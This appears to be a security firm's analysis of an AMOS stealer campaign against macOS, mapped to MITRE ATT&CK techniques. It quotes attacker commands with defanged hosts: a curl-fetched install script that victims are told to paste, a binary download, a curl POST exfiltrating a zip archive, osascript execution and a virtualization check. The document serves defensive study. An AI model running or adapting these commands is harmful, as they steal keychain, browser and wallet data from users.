An MDR Analysis of the AMOS Stealer Campaign Targeting macOS via ‘Cracked’ Apps

MITRE Techniques

• [T1204] User Execution – Victims are tricked into running malicious installers or pasting curl commands into Terminal: “…victims were instructed to paste the following command into the macOS Terminal: curl -fsSL hxxps://goatramz[.]com/get4/install.sh…”
• [T1059] Command and Scripting Interpreter – The campaign uses shell scripts, AppleScript, and osascript to execute payloads and automate actions: “…osascript executed the file ‘/tmp/update’…sh -c osascript -e ‘…do shell script “system_profiler SPMemoryDataType”…’”
• [T1105] Ingress Tool Transfer – The attacker-hosted domains deliver installer files and binaries via curl/wget: “curl -o ‘/Users//.helper’ hxxps://halesmp[.]com/zxc/app”
• [T1547] Boot or Logon Autostart Execution – Persistence via LaunchDaemon configuration to run .agent script at system load: “com.finder.helper.plist configures a MacOS LaunchDaemon to continuously run the ‘.agent’ script”
• [T1005] Data from Local System – The malware collects local files including browser databases, keychain, Apple Notes, and wallet files: “collects browser cookies, login data, cryptocurrency wallet information, Telegram Desktop data, OpenVPN profiles, and keychain data”
• [T1041] Exfiltration Over C2 Channel – Collected data is compressed and exfiltrated via HTTP/HTTPS POST to attacker-controlled servers: “…curl -X POST -F file=@/tmp/out.zip hxxps://sivvino[.]com/contact…”
• [T1089] Disabling Security Tools – The campaign leverages user interaction and Terminal commands to bypass Gatekeeper protections rather than directly disabling them: “…instructed to copy and paste a malicious command into the Apple Terminal… Doing so bypasses macOS’s built-in security features, such as Gatekeeper.”
• [T1497] Virtualization/Sandbox Evasion – The update AppleScript checks for virtualization and exits if detected: “…if memData contains ‘QEMU’ or memData contains ‘VMware’ or memData contains ‘KVM’… set exitCode to 100”